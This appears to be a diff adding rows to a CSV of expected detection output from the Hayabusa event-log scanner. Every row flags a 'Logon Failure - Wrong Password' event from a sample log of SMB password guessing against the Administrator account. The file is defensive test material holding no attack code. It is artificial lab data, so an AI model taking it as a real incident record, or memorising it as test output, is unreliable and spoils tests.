+2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
